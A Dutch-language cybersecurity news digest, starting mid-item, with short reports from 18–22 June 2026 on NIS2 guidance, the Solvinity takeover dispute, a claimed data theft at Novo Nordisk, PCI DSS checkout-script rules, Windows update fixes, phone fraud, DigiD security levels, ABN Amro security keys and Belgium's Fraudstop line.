Het rapport adviseert organisaties om AI te behandelen als een integraal onderdeel van de IT infrastructuur. Dit omvat het toepassen van dezelfde kritische controle op AI-diensten als op andere kritieke leveranciers, inclusief inkoopbeoordelingen, contractuele voorwaarden voor gegevensverwerking, een actuele inventaris van goedgekeurde en niet-goedgekeurde hulpmiddelen met AI, en technische controles op toegang, uitvoering, actieketens en privileges. De enquête werd uitgevoerd door Pollfish van 1 tot 8 mei 2026 en omvatte zes senioriteitsniveaus.

 

Bron: Heimdal

18 juni 2026 | Nieuw Europees richtsnoer ondersteunt organisaties bij NIS2-beveiligingsmaatregelen

De Europese Unie heeft een nieuw richtsnoer geïntroduceerd dat organisaties moet ondersteunen bij de implementatie van de NIS2-richtlijn, specifiek gericht op de vereiste beveiligingsmaatregelen. Dit document, waarvan het belang als 'kritiek' wordt bestempeld, benadrukt de urgentie en het belang van robuuste cybersecurity binnen essentiële en belangrijke entiteiten in de EU, waaronder die in Nederland en België.

De NIS2-richtlijn, die op 16 januari 2023 van kracht werd en uiterlijk in oktober 2024 in nationale wetgeving moet zijn omgezet, heeft als doel de algehele cybersecurityresistentie in de lidstaten te verhogen. Het richtsnoer komt op een cruciaal moment, nu veel organisaties zich voorbereiden op de concrete implementatie van de verplichte beveiligingsprotocollen en meldingsplichten. Het biedt praktische handvatten en interpretaties om aan de complexe eisen van de richtlijn te voldoen.

Organisaties die onder de NIS2-richtlijn vallen, waaronder entiteiten in sectoren zoals energie, transport, gezondheidszorg, digitale infrastructuur en overheidsdiensten, worden geconfronteerd met strengere eisen voor risicomanagement en incidentrespons. Het nieuwe Europese richtsnoer is bedoeld om deze organisaties te begeleiden bij het identificeren, evalueren en implementeren van de juiste technische en organisatorische maatregelen om cyberdreigingen effectief te mitigeren. De aanduiding van het belang als 'kritiek' onderstreept de noodzaak voor snelle en doeltreffende actie om de digitale infrastructuur van Europa te beschermen tegen een toenemend aantal en steeds complexere cyberaanvallen. Dit initiatief vanuit Europees niveau draagt bij aan een meer uniforme en veerkrachtige benadering van cybersecurity binnen de Unie.

 

Bron: CCB België

18 juni 2026 | Solvinity gaat in beroep tegen overnameverbod DigiD-beheerder

Solvinity, beheerder van cruciale Nederlandse digitale infrastructuur zoals DigiD en MijnOverheid, gaat in beroep tegen het overnameverbod dat het kabinet recentelijk heeft opgelegd. Dit meldt NRC op basis van een ingediend verzoek bij de rechtbank, een bericht dat door een woordvoerder van staatssecretaris Aerdts voor Digitale Economie tegenover de NOS is bevestigd.

Eind mei besloot Aerdts de overname van Solvinity door het Amerikaanse Kyndryl te verbieden. Dit besluit volgde op advies van het Bureau Toetsing Investeringen (BTI). De staatssecretaris gaf aan dat zij "ter bescherming van het publieke belang" geen andere optie zag dan een overnameverbod uit te vaardigen.

De zorgen over de overname vloeien voort uit het feit dat DigiD, MijnOverheid en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid draaien op servers die door Solvinity worden beheerd. Experts en politici spraken hun bezorgdheid uit over de mogelijke Amerikaanse invloed op de beschikbaarheid en de data van DigiD, mocht Solvinity door Kyndryl worden overgenomen.

Solvinity erkent de geuite zorgen van de overheid. "Wij nemen de zorgen die de overheid heeft geuit serieus," aldus Solvinity tegenover NRC. Tegelijkertijd benadrukt het bedrijf de noodzaak van helderheid over de feitelijke en juridische grondslag van het besluit. Solvinity stelt dat pas met deze helderheid weloverwogen vervolgstappen kunnen worden gezet richting de best mogelijke uitkomst voor het bedrijf, in samenwerking met de overheid.

Solvinity heeft de rechtbank verzocht om de zaak achter gesloten deuren te behandelen. De rechtbank is hier echter niet mee akkoord gegaan. Wel bestaat de mogelijkheid dat bepaalde delen van de mondelinge behandeling niet openbaar zullen zijn, zo meldt NRC. Een woordvoerder van staatssecretaris Aerdts bevestigt tegenover de NOS dat er een verzoek bij de rechter ligt en dat er om die reden verder geen commentaar kan worden gegeven.

 

Bron: Oracle

18 juni 2026 | Hackersgroep claimt grootschalige datadiefstal bij farmareus Novo Nordisk

Novo Nordisk, de Deense farmareus achter de afslankmiddelen Ozempic en Wegovy, heeft bevestigd dat onbevoegden toegang hebben gehad tot een beperkt aantal interne systemen. Het bedrijf maakte het incident op 11 juni bekend en zegt onderzoek te doen naar de omvang.

De hackersgroep FulcrumSec eist de aanval op en claimt ruim een terabyte aan data te hebben buitgemaakt. Volgens de groep had zij meer dan twee maanden toegang tot de interne omgeving. De geclaimde buit zou onder meer broncode, gegevens uit klinische studies, gegevens van medewerkers, artsen en patiënten en interne informatie over de gebruikte AI omvatten. Die omvang is niet onafhankelijk bevestigd en berust vooralsnog op de claim van de groep.

FulcrumSec stelt dat Novo Nordisk een losgeldeis van 25 miljoen dollar weigerde en zegt nu delen van de data privé te koop aan te bieden. Naar verluidt is de groep begonnen met het lekken van gestolen gegevens.

De groep voert de eerste toegang terug op een token van GitHub dat in maart werd gevonden, waarmee interne repositories konden worden gekloond en verdere inloggegevens konden worden bemachtigd.

Mochten de claims kloppen, dan raakt het datalek mogelijk gevoelige gegevens van deelnemers aan medicijnstudies, zoals gezondheidsdata en persoonskenmerken. Novo Nordisk is een Deens bedrijf, maar de medicijnen Ozempic en Wegovy worden ook in Nederland en België veel voorgeschreven.

Bron: Novo Nordisk | Bron 2: SecurityWeek

19 juni 2026 | Frankrijk beëindigt AI-samenwerking met Palantir voor nationale oplossing

De Franse binnenlandse inlichtingendienst (DGSI) heeft besloten de samenwerking met het Amerikaanse bedrijf Palantir, gespecialiseerd in kunstmatige intelligentie, te beëindigen. Deze strategische verschuiving markeert een belangrijke stap richting digitale soevereiniteit, waarbij Frankrijk kiest voor een nationale oplossing. Voortaan zal de DGSI samenwerken met ChapsVision, een Frans bedrijf dat eveneens actief is in de technologie voor kunstmatige intelligentie.

Deze beslissing, die verstrekkende implicaties heeft voor de nationale veiligheid en technologische onafhankelijkheid van Frankrijk, werd bevestigd door premier Sébastien Lecornu. Volgens Lecornu zijn nieuwe investeringen cruciaal om de ontwikkeling van eigen kunstmatige intelligentie binnen Frankrijk te stimuleren. Het doel is om niet afhankelijk te zijn van buitenlandse technologieën voor vitale staatsfuncties, met name op het gebied van inlichtingen.

Techcommentator Ben van der Burg gaf commentaar op deze ontwikkeling en stelde dat Frankrijk hiermee 'lef toont, maar zichzelf ook een beetje overschat'. De overgang naar een binnenlandse partner voor kunstmatige intelligentie reflecteert een groeiende trend onder Europese landen om de controle over gevoelige data en technologieën te behouden en te versterken. Dit beleid kan in de toekomst bredere navolging krijgen in de Europese Unie, waaronder Nederland en België, die eveneens de strategische waarde van digitale soevereiniteit inzien.

 

Bron: BNR Nieuwsradio

19 juni 2026 | Nieuwe PCI DSS-regels maken checkout-scripts tot kritiek beveiligingsrisico

De scripts die op de betaalpagina's van webwinkels draaien, vormen nu een direct PCI DSS-probleem, zo blijkt uit een onafhankelijke beoordeling. Moderne checkout-pagina's laden vaak tientallen scripts van derden, variërend van analytische tags en tagmanagers tot ondersteuningswidgets en betaal-iframes. Elk van deze scripts kan misbruikt worden voor webskimming, een methode die bekendstaat als Magecart.

Sansec heeft meer dan 100.000 websites geteld die getroffen zijn door webskimming en supply chain aanvallen. Een prominent voorbeeld is de datalek bij British Airways in 2018, waarbij 380.000 transacties werden blootgelegd en een boete van £183 miljoen dreigde. Het gevaar schuilt erin dat kwaadaardige code vaak wordt geïnjecteerd via scripts die al zijn goedgekeurd door de webwinkel. Aanvallers compromitteren een externe leverancier, waarna de payload meelift op een script dat al maanden actief is. De aanwezigheid van het script verandert niet, maar het gedrag ervan wel.

PCI DSS v4.0.1, waarvan de vereisten nu volledig van kracht zijn, poogt dit gat te dichten met twee specifieke eisen. Vereiste 6.4.3 stelt dat elke betalingspagina script moet worden geïnventariseerd, geautoriseerd en op integriteit moet worden gecontroleerd. Vereiste 11.6.1 vereist de detectie van manipulatie met pagina-inhoud en HTTP-headers op het moment dat de browser deze ontvangt. Het handmatig uitvoeren van deze controles is vrijwel onhaalbaar, gezien het grote aantal scripts en de frequente wijzigingen; Reflectiz data toont aan dat ongeveer 30% van de betalingspagina scripts binnen een periode van twee weken verandert.

Integrity360 Europe, een PCI Qualified Security Assessor en lid van de PCI SSC Global Executive Assessor Roundtable, heeft het Reflectiz PCI DSS Platform getoetst aan beide vereisten en concludeerde dat het effectief kan bijdragen aan compliance. Drie aspecten van het platform werden daarbij benadrukt:

*   Het monitort gedrag, niet alleen bestandhashes. Een hash-check mist een stille wijziging aan de leverancierskant; Reflectiz detecteert een script zodra het probeert toegang te krijgen tot kaartgegevens.

*   De implementatie is agentloos. Dit betekent geen code-wijzigingen, geen snippets, en een snelle livegang binnen enkele dagen, waarbij het platform blijft werken bij refactoring en CMS-migraties.

*   Het genereert audit-klaar bewijsmateriaal met één klik, inclusief een volledig audittraject per pagina.

Sinds januari 2025 kunnen merchants vereisten 6.4.3 en 11.6.1 alleen weglaten uit SAQ A als zij kunnen aantonen dat hun site niet vatbaar is voor scriptaanvallen. Een volledige redirect naar de betalingsverwerker is vaak voldoende. Echter, als er een betaal-iframe wordt ingebed, kan een script op de bovenliggende pagina nog steeds de checkout kapen voordat gegevens de beveiligde iframe bereiken. In dat geval moet de merchant bewijzen dat dit niet kan gebeuren, wat PCI SSC FAQ #1588 bevestigt.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

19 juni 2026 | Kabinet weigert advies over overnameverbod Solvinity openbaar te maken

Het kabinet heeft besloten het advies van het Bureau Toetsing Investeringen (BTI) niet openbaar te maken, waarin werd aangeraden de beoogde Amerikaanse overname van de Nederlandse IT-dienstverlener Solvinity te verbieden. Staatssecretaris Aerdts voor Digitale Economie heeft tevens geen uitspraken gedaan over de specifieke risico's, analyses of afwegingen die ten grondslag lagen aan dit overnameverbod. Dit liet zij weten in antwoord op Kamervragen van Kamerlid Van den Berg van JA21.

Eind mei had staatssecretaris Aerdts, op basis van het BTI-advies, de overname van Solvinity door het Amerikaanse Kyndryl verboden. Zij gaf aan dat zij "ter bescherming van het publieke belang" geen andere optie zag dan een overnameverbod uit te vaardigen. Solvinity is een cruciale speler in de Nederlandse digitale infrastructuur, aangezien de diensten DigiD en MijnOverheid draaien op servers van het bedrijf. Ook het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid maakt gebruik van Solvinity's infrastructuur. Eerder hadden experts en politici reeds hun zorgen geuit over de mogelijke Amerikaanse invloed op de beschikbaarheid en de data van DigiD indien de overname zou plaatsvinden.

Solvinity maakte eerder deze week bekend in beroep te gaan tegen het overnameverbod. Het bedrijf stelt de geuite zorgen van de overheid serieus te nemen, maar heeft tegelijkertijd behoefte aan helderheid over de feitelijke en juridische grondslag van het besluit. Pas met die duidelijkheid kan Solvinity, in samenwerking met de overheid, weloverwogen vervolgstappen zetten.

Kamerlid Van den Berg wilde van de staatssecretaris weten welke specifieke risico's op het gebied van veiligheid, afhankelijkheid, governance of soevereiniteit de basis vormden voor het negatieve BTI-advies en of digitale autonomie hierin een rol speelde. Aerdts antwoordde dat het kabinet geen uitspraken doet over de specifieke risico's, analyses of afwegingen die ten grondslag liggen aan de beoordeling van individuele zaken op grond van de Telecommunicatiewet. De staatssecretaris voegde daaraan toe dat digitale autonomie geen afzonderlijk wettelijk criterium is binnen de Wet ongewenste zeggenschap telecommunicatie (WOZT). Deze wet stelt het kabinet in staat overnames te verbieden die een "bedreiging van het publiek belang" kunnen vormen. Het BTI fungeert als de toezichthouder die overnames op deze grondslag toetst.

Op de vraag of zij het volledige BTI-advies, inclusief de onderliggende overwegingen en risicoanalyses, met de Tweede Kamer wilde delen, antwoordde de bewindsvrouw eveneens ontkennend. Volgens Aerdts bevatten de betreffende stukken vertrouwelijke bedrijfsinformatie, informatie die vertrouwelijk is voor het toezicht en informatie die de staatsveiligheid kan raken. Openbaarmaking hiervan zou afbreuk kunnen doen aan de belangen die de wet juist beoogt te beschermen.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

19 juni 2026 | Minister weerlegt 'one-stop-shop' risico voor hackers in nieuw zorgsysteem

Minister Sterk van Langdurige Zorg heeft gereageerd op de beweringen van stichting Privacy First dat de ontwikkeling van een nieuw zorgsysteem en de bijbehorende gegevensuitwisseling zouden leiden tot een "one-stop-shop" voor hackers. De minister stelt dat Privacy First het op verschillende punten bij het verkeerde eind heeft.

Enkele weken geleden uitte Privacy First haar zorgen in aanloop naar een commissiedebat over digitale ontwikkelingen in de zorg. De stichting waarschuwde voor aanzienlijke privacy- en veiligheidsrisico's als gevolg van het grootschalig en ongericht delen van medische gegevens. Volgens Privacy First zouden gecentraliseerde voorzieningen, onder invloed van een politiek krachtenveld, de keuzevrijheid van patiënten over hun gegevens beperken en hackers een gemakkelijk toegangspunt bieden tot "alles, van iedereen".

In een kabinetsreactie weerlegt minister Sterk dit beeld. Zij benadrukt dat het Landelijk Dekkend Netwerk (LDN) geen centrale database is waarin medische gegevens van alle Nederlanders worden samengebracht. De gegevens blijven in beginsel bij de bron, oftewel bij de zorgaanbieder of organisatie waar de data is geregistreerd. De bronhouder blijft verantwoordelijk voor het beheer van deze gegevens. Het LDN faciliteert wel de uitwisseling van gegevens uit verschillende bronnen, indien dit noodzakelijk is binnen het zorgproces.

De minister stelt dat het geschetste scenario van een "one-stop-shop" voor hackers niet wordt onderschreven. Een aanval op een specifieke functie of voorziening binnen het stelsel zou niet betekenen dat alle medische gegevens van alle burgers op één plek beschikbaar zijn. De beveiligingsstructuur is gelaagd, doordat gegevens bij de bron blijven, onder verantwoordelijkheid van de bronhouder worden beheerd, en de toegang via landelijke afspraken en generieke functies wordt begrensd, gecontroleerd en herleidbaar gemaakt.

Privacy First pleit voor gerichte databeschikbaarheid in de zorg als standaard. De minister erkent dat dit voor veel zorgprocessen voor de hand ligt, maar voegt toe dat er ook situaties zijn waarin een bredere beschikbaarheid van medische gegevens noodzakelijk is. Daarom worden naast gericht beschikbaar stellen ook andere vormen van uitwisseling mogelijk gemaakt. De minister sluit af met de opmerking dat vernieuwing van het zorgstelsel alleen verantwoord is als dit gepaard gaat met het behoud van maatschappelijk vertrouwen. Patiënten moeten kunnen begrijpen welke gegevens worden gebruikt, door wie, voor welk doel, onder welke voorwaarden en met welke rechten.

 

Bron: theregister.com | Bron 2: privacyfirst.nl | Bron 3: autoriteitpersoonsgegevens.nl

19 juni 2026 | Microsoft verhelpt installatieproblemen beveiligingsupdates Windows Server 2016

Microsoft heeft een bekend probleem opgelost dat ervoor zorgde dat de beveiligingsupdates van juni 2026 niet correct werden geïnstalleerd op Windows Server 2016-systemen die niet volledig up-to-date waren. Dit probleem werd door Microsoft erkend in een service alert in de beheerdersportal, na meldingen van IT-beheerders over foutcodes zoals 0x80070002 of FILE_NOT_FOUND op de getroffen systemen.

Het probleem deed zich voornamelijk voor bij gebruikers die probeerden de KB5094122-update te installeren zonder eerst de beveiligingsupdate KB5087537 van de vorige maand te hebben toegepast. Microsoft heeft bevestigd dat dit installatieprobleem nu is verholpen, waardoor getroffen apparaten geen installatiefouten meer zouden moeten ervaren bij het uitrollen van de KB5094122-beveiligingsupdate van juni 2026.

Microsoft heeft in de afgelopen periode meerdere installatieproblemen met updates voor Windows moeten verhelpen. Vorige maand werd een soortgelijk probleem opgelost dat installatiefouten en 0x800f0922-fouten veroorzaakte bij het implementeren van de beveiligingsupdate KB5089549 voor Windows 11 van mei 2026. Deze fouten werden getriggerd door onvoldoende vrije ruimte op de EFI System Partition (ESP), wat ertoe leidde dat de update automatisch werd teruggedraaid op de getroffen apparaten.

Begin juni waarschuwde Microsoft gebruikers ook al voor mogelijke problemen bij het installeren van de meest recente maandelijkse updates, waarbij foutcodes zoals 0x80073712 of 0x800f0993 konden optreden op sommige Windows-apparaten die waren geüpgraded naar Windows 11 24H2 of 25H2. Vorige week werd ook een bekend probleem verholpen dat ervoor zorgde dat Windows Server 2025-apparaten in BitLocker-herstel opstartten na het installeren van de beveiligingsupdate van april 2026. Daarnaast werd een bug gepatcht die installatiefouten veroorzaakte voor updates voor Windows die sinds mei 2025 waren uitgebracht, wanneer deze werden geïnstalleerd met behulp van de Windows Update Standalone Installer (WUSA).

Afgelopen woensdag bevestigde Microsoft eveneens dat het onderzoek doet naar een probleem dat het starten van applicaties van derden, zoals Word, Excel, PowerPoint en Access, blokkeert na de installatie van de updates van juni 2026.

 

Bron: Microsoft

19 juni 2026 | Nieuwe varianten Engelstalige robotcalls uit naam van bekende bedrijven

De Fraudehelpdesk waarschuwt voor recente varianten van telefonische oplichting, bekend als het 'Engelstalige bandje', waarbij fraudeurs zich voordoen als medewerkers van gerenommeerde bedrijven zoals PayPal, eBay, iDeal, De Nederlandsche Bank (DNB), Klarna en Apple Pay. Hoewel de meeste van deze geautomatiseerde telefoontjes Engelstalig zijn, komen er ook meldingen binnen van Nederlandstalige robotcalls.

De werkwijze van de oplichters is consistent. Na het opnemen van de telefoon krijgt de ontvanger een ingesproken bericht te horen, vaak gevolgd door een keuzemenu. Een veelvoorkomend scenario, met name bij telefoontjes die zogenaamd namens Amazon worden gevoerd, betreft een melding over een goed te keuren betaling van €300. Slachtoffers worden verleid om via het keuzemenu te kiezen tussen het wel of niet accorderen van deze transactie.

Enkele personen die wel via het keuzemenu een "medewerker" spraken, werden doorverbonden met een oplichter. Deze oplichter vroeg vervolgens, onder diverse voorwendselen, om toegang te krijgen tot de computer van het slachtoffer. Eenmaal toegang verkregen, werden er online aankopen verricht of werd geld van de bankrekening van de gedupeerde overgemaakt naar onbekende rekeningen.

De Fraudehelpdesk adviseert dringend om de verbinding direct te verbreken bij het ontvangen van een geautomatiseerd telefoontje met een ingesproken bericht. Het is cruciaal om nooit via een keuzemenu doorverbonden te worden met een medewerker, aangezien dit altijd een oplichter zal zijn. Indien men toch het slachtoffer is geworden van deze fraude, wordt geadviseerd direct contact op te nemen met de Fraudehelpdesk. Dit specifieke waarschuwingsbericht werd oorspronkelijk gepubliceerd op 25 oktober 2024.

 

Bron: Fraudehelpdesk

20 juni 2026 | Nederland te afhankelijk van Amerikaanse techbedrijven, aldus AP-voorzitter

Aleid Wolfsen, de vertrekkend voorzitter van de Autoriteit Persoonsgegevens (AP), heeft zijn zorgen geuit over de aanzienlijke afhankelijkheid van Nederland van Amerikaanse technologiebedrijven. In een interview met Sven Kockelmann in het radioprogramma Sven op 1 stelde Wolfsen dat Nederland met spoed actie moet ondernemen om deze afhankelijkheid van de Verenigde Staten te verminderen. Hij waarschuwde dat de Nederlandse overheid kwetsbaar is: "Als de Amerikaanse president dat wil, ligt morgen de halve Nederlandse overheid stil, door de afhankelijkheid die er nu is van Amerikaanse techbedrijven."

Wolfsen illustreerde zijn punt met een recent voorval. Hij noemde techbedrijf Anthropic, dat AI modellen zoals Fable 5 en Mythos 5 voor klanten buiten Amerika uitschakelde, zonder formele bevoegdheid van de Amerikaanse president. Hij merkte op: "Trump heeft daar geen bevoegdheid voor toegepast, maar dat bedrijf gehoorzaamt. Dat zie je ook bij andere bedrijven." Dit voorbeeld onderstreept zijn angst dat een Amerikaanse president in de toekomst een 'killswitch' zou kunnen activeren bij een conflict met de Nederlandse overheid.

De kern van het probleem ligt volgens Wolfsen in de diepgewortelde integratie van deze systemen en het gebrek aan adequate exitstrategieën. "Het is zo verknoopt," legde hij uit. De AP adviseert daarom grote overheidsinstanties om dergelijke strategieën te ontwikkelen, zodat data snel kan worden overgezet of alternatieve mogelijkheden beschikbaar zijn in geval van een incident. Deze kwetsbaarheid is een kritiek punt voor de digitale soevereiniteit van Nederland.

De AP-voorzitter benadrukte dat Europa 'als de bliksem' aan de slag moet om zich los te maken van deze Amerikaanse techbedrijven. Hij voegde eraan toe dat dit niet betekent dat alle gegevens volledig moeten worden verwijderd bij deze bedrijven. Echter, voor gevoelige informatie zoals gezondheidsgegevens, contacten met de overheid en banksystemen, is het essentieel om een onafhankelijkere positie in te nemen. De oproep van Wolfsen onderstreept de noodzaak voor een strategische heroverweging van de digitale infrastructuur en datahuishouding binnen Nederland en de bredere Europese Unie.

 

Bron: zijnwealautonoom.nl | Bron 2: buy-european.net | Bron 3: european-alternatives.eu

20 juni 2026 | EFF bekritiseert Brits socialemediaverbod wegens privacy- en vrijheidsrisico's

De Amerikaanse burgerrechtenbeweging Electronic Frontier Foundation (EFF) heeft kritiek geuit op het voorgenomen socialemediaverbod van de Britse regering. Volgens de EFF doet dit beleid meer kwaad dan goed en ondermijnt het de privacy en de vrijheid van meningsuiting van internetgebruikers. De beweging stelt dat de Britse regering dit beleid ten onrechte presenteert als een noodzakelijke reactie op groeiende zorgen over online gevaren voor jongeren. De EFF benadrukt dat het, net als de eerder ingevoerde Online Safety Act, negatieve gevolgen zal hebben.

Een van de kernproblemen die de EFF aankaart, is het gebrek aan een betrouwbare methode voor online leeftijdsverificatie die tegelijkertijd de privacy van gebruikers waarborgt. De burgerrechtenbeweging argumenteert dat overheidsbeleid effectief, proportioneel en respectvol moet zijn ten aanzien van fundamentele rechten. Zij vinden dat jongeren beter verdienen dan beleid dat gebaseerd is op paniek, en dat alle internetgebruikers recht hebben op een veilig en vrij internet. Een verbod op sociale media mag dan wel de aandacht trekken, maar lost de onderliggende problemen volgens de EFF niet op.

De Britse overheid lijkt de enige oplossing voor problemen rond sociale media te zien in het beperken van de toegang door een verplichte leeftijdscontrole voor alle gebruikers in te voeren. De EFF stelt echter dat de fundamentele problemen hierdoor niet verdwijnen. Zelfs als er een methode zou bestaan om leeftijden te verifiëren zonder privacy in te leveren, zou een dergelijk verbod uiteindelijk leiden tot een beperkte toegang tot vrije meningsuiting, belangrijke online gemeenschappen en cultuur, zo besluit de EFF haar pleidooi.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

20 juni 2026 | Staatssecretaris: Te weinig burgers activeren hogere DigiD-beveiliging

Staatssecretaris Van der Burg van Binnenlandse Zaken heeft geconstateerd dat te weinig Nederlanders de hogere betrouwbaarheidsniveaus van DigiD hebben ingeschakeld. Deze lage adoptie verhindert momenteel het uitfaseren van de lagere beveiligingsniveaus van het digitale identificatiemiddel. DigiD, beheerd door Logius, aanbieder van DigiD, kent vier niveaus waarop gebruikers zich kunnen authenticeren, waarbij elk niveau een hogere mate van zekerheid biedt over de identiteit van de gebruiker.

Het laagste niveau, DigiD Basis, maakt inloggen mogelijk met alleen een gebruikersnaam en wachtwoord. Dit niveau voldoet echter niet aan de eisen van de Europese eIDAS-verordening, die minimaal tweefactorauthenticatie vereist voor betrouwbaarheidsniveau laag. Om die reden zal DigiD Basis geleidelijk worden uitgefaseerd, zo meldt Digitale Overheid.

Daarboven bevindt zich DigiD Midden, waarbij gebruikers kunnen inloggen met een gebruikersnaam en wachtwoord, aangevuld met een via sms verstuurde code, of via de app van DigiD op hun smartphone. Dit niveau zal uiteindelijk overeenkomen met het betrouwbaarheidsniveau eIDAS-Laag.

Het derde niveau is DigiD Substantieel, dat vereist is voor toegang tot extra privacygevoelige gegevens, zoals gezondheidsinformatie. Voor dit niveau is een eenmalige identiteitscontrole van de gebruiker nodig. Op telefoons met een NFC lezer controleert de app van DigiD de gegevens op de chip van het identiteitsbewijs.

Het hoogste niveau, DigiD Hoog, stelt gebruikers in staat in te loggen via hun rijbewijs of identiteitskaart en een bijbehorende pincode. Gebruikers moeten hiervoor eerst de inlogfunctie van hun identiteitskaart of rijbewijs activeren in Mijn DigiD, waarna zij met hun identiteitsbewijs kunnen inloggen bij alle online diensten die via DigiD toegankelijk zijn.

Vorig jaar werd besloten de overgangstermijn te verlengen waarin overheden onlinediensten op het betrouwbaarheidsniveau laag mogen blijven aanbieden. Overheden krijgen nu tot 1 juli 2028 de tijd om de hogere inlogniveaus Substantieel of Hoog beschikbaar te maken. Steeds meer instanties vragen inmiddels om in te loggen met DigiD Midden.

Tijdens een debat met de vaste commissie voor Digitale Zaken werd staatssecretaris Van der Burg bevraagd door Kamerlid Van den Berg van JA21 over deze verlenging. De staatssecretaris legde uit dat de lage adoptie van de hogere niveaus de voornaamste reden is voor de verlenging. Op dit moment hebben zes miljoen burgers DigiD Substantieel of Hoog geactiveerd. Als dienstverleners al op 1 juli 2026 waren overgestapt naar deze hogere niveaus, zou een aanzienlijke groep mensen zijn uitgesloten, waaronder de drie miljoen mensen die jaarlijks nog via sms inloggen. De bewindsman benadrukte dat de focus ligt op het ruimer beschikbaar maken van inlogmiddelen op een hoger betrouwbaarheidsniveau en het verbreden van de toegankelijkheid, alvorens de volgende stap te zetten.

 

Bron: radar.avrotros.nl | Bron 2: app.opencve.io

20 juni 2026 | Kabinet wil Europese voorstellen die AVG verzwakken laten schrappen

Het Nederlandse kabinet wil dat de Europese Commissie een aantal voorstellen schrapt die de Algemene Verordening Gegevensbescherming (AVG) zouden verzwakken. Het gaat om onderdelen van de zogenoemde Digitale Omnibus, een pakket dat de Commissie op 19 november 2025 presenteerde om digitale regelgeving te vereenvoudigen en de regeldruk te verlagen. Volgens het kabinet gaan sommige wijzigingen verder dan vereenvoudiging en verlagen ze het beschermingsniveau van persoonsgegevens te veel.

De zorgen richten zich op meerdere fundamentele aanpassingen. Zo wil Brussel de definitie van persoonsgegevens veranderen, wordt het verwerken van bijzondere persoonsgegevens voor het ontwikkelen en trainen van AI modellen mogelijk gemaakt, wordt het eenvoudiger om gegevens te verwerken op basis van een gerechtvaardigd belang en wordt de meldplicht bij datalekken versoepeld. Het kabinet stelt dat deze veranderingen de bescherming van burgers aanzienlijk verminderen zonder dat ze de regeldruk effectief verlagen.

In een informele notitie aan Brussel pleit het kabinet ervoor om de artikelen die verder gaan dan vereenvoudiging te schrappen of waar nodig aan te passen. Het uitgangspunt is dat het vereenvoudigen van wetgeving niet ten koste mag gaan van de doelen ervan, waaronder de bescherming van grondrechten. Het voorstel doorloopt op dit moment de Europese onderhandelingen, waarbij het Europees Parlement eerder dit jaar zijn conceptstandpunt vaststelde.

 

Bron: Rijksoverheid | Bron 2: security.nl

22 juni 2026 | ABN Amro vervangt e.dentifier door usb security key voor internetbankieren

ABN Amro heeft aangekondigd de e.dentifier die privéklanten momenteel gebruiken voor internetbankieren te vervangen door een nieuwe usb security key. Deze significante wijziging, die in fasen zal worden uitgerold, heeft als primair doel om de veiligheid van bankzaken in de toekomst te blijven waarborgen. Naast de introductie van de usb security key, blijft het voor klanten ook mogelijk om, net als nu al het geval is, in te loggen via de ABN Amro app op hun mobiele telefoon of tablet, wat aansluit bij het toenemende gebruik van mobiele apparaten voor bankzaken.

De bank benadrukt de proactieve aard van deze aanpassing. Een woordvoerder van ABN Amro stelde: "Als bank hebben wij de plicht om altijd voorop te lopen in het veilig houden van rekeningen en persoonlijke gegevens van onze klanten. Wij ondernemen nu actie om te voorkomen dat er pas wordt gehandeld zodra er een direct risico ontstaat - dan is het immers te laat." Deze verklaring onderstreept de strategie van de bank om potentiële toekomstige dreigingen voor te zijn.

Voor klanten die geen geschikte smartphone bezitten of de voorkeur geven aan een alternatieve methode voor hun bankzaken, biedt de usb security key een geschikte oplossing. Dit apparaat, met een aanschafprijs van ongeveer tien euro, wordt omschreven als een compacte usb-stick die eenvoudig in een computer kan worden gestoken. Het inlogproces via de security key is ontworpen voor gebruiksgemak en veiligheid. Gebruikers dienen hun e-mailadres en een pincode op te geven, waarna als laatste stap de achterkant van de security key fysiek moet worden aangeraakt om de authenticatie te voltooien.

De introductie van de usb security key zal gefaseerd plaatsvinden. De uitrol begint met de privéklanten van ABN Amro. Zij zullen tussen juni en december van dit jaar persoonlijk benaderd en geïnformeerd worden over het moment waarop zij aan de beurt zijn om hun nieuwe manier van inloggen te kiezen. Na de privéklanten zullen de groot zakelijke en klein zakelijke klanten van de bank in 2027 volgen. Met deze strategische stap wil ABN Amro haar positie als veilige en betrouwbare bank verder verstevigen, inspelend op de voortdurend evoluerende eisen op het gebied van digitale beveiliging en de voorkeuren van haar diverse klantenbestand.

 

Bron: ABN Amro

22 juni 2026 | België lanceert Fraudstop: één centraal nummer voor het blokkeren van banktoegang na phishing

De Belgische Minister van Consumentenbescherming Rob Beenders en bankenfederatie Febelfin hebben vandaag Fraudstop gelanceerd. Dit nieuwe, centrale telefoonnummer stelt (potentiële) slachtoffers van phishing in staat om direct de toegang tot hun pc banking en bank app te laten blokkeren. Voorheen moesten zij hiervoor vaak contact opnemen met hun eigen bank, terwijl Card Stop zich enkel richtte op het blokkeren van betaalkaarten. Met Fraudstop is het nu mogelijk om beide tegelijkertijd en via hetzelfde nummer te regelen: 078 170 170.

Snel handelen is cruciaal wanneer men vermoedt slachtoffer te zijn geworden van phishing, of wanneer een fysieke bankkaart is gestolen of verloren. De fraudedienst kan dan onmiddellijk de toegang tot digitale betaaltoepassingen blokkeren om verdere financiële schade te voorkomen. Dit geldt ook voor elektronische maaltijd- of ecocheques. Waar voorheen twee afzonderlijke telefoontjes nodig waren – één naar de fraudedienst van de eigen bank en één naar Card Stop – volstaat nu één oproep.

Fraudstop is 24 uur per dag, 7 dagen per week bereikbaar via het vertrouwde nummer van Card Stop. De afhandeling verschilt per bank. Voor klanten van ING, Beobank, Nagelmackers, Banque CPH en Banque Chaabi du Maroc stuurt een medewerker van Fraudstop een automatisch bericht naar de betreffende bank, waarna de digitale betaaltoepassingen worden geblokkeerd. Bij alle andere banken verbindt Fraudstop de beller door met een medewerker van de fraudedienst van de eigen bank, die de blokkering vervolgens uitvoert. De meeste Belgische banken participeren in Fraudstop, al zijn enkele neobanken (nog) niet aangesloten.

Een belangrijke waarschuwing: noch Card Stop, noch Fraudstop zal ooit zelf een klant opbellen. Ontvangt men een telefoontje of voicemailbericht dat zogenaamd afkomstig is van een van deze diensten, dan is het advies om onmiddellijk in te haken en absoluut geen persoonlijke informatie, pincodes of wachtwoorden te delen. Oplichters maken regelmatig misbruik van de naam Card Stop, en de verwachting is dat dit ook met Fraudstop zal gebeuren.

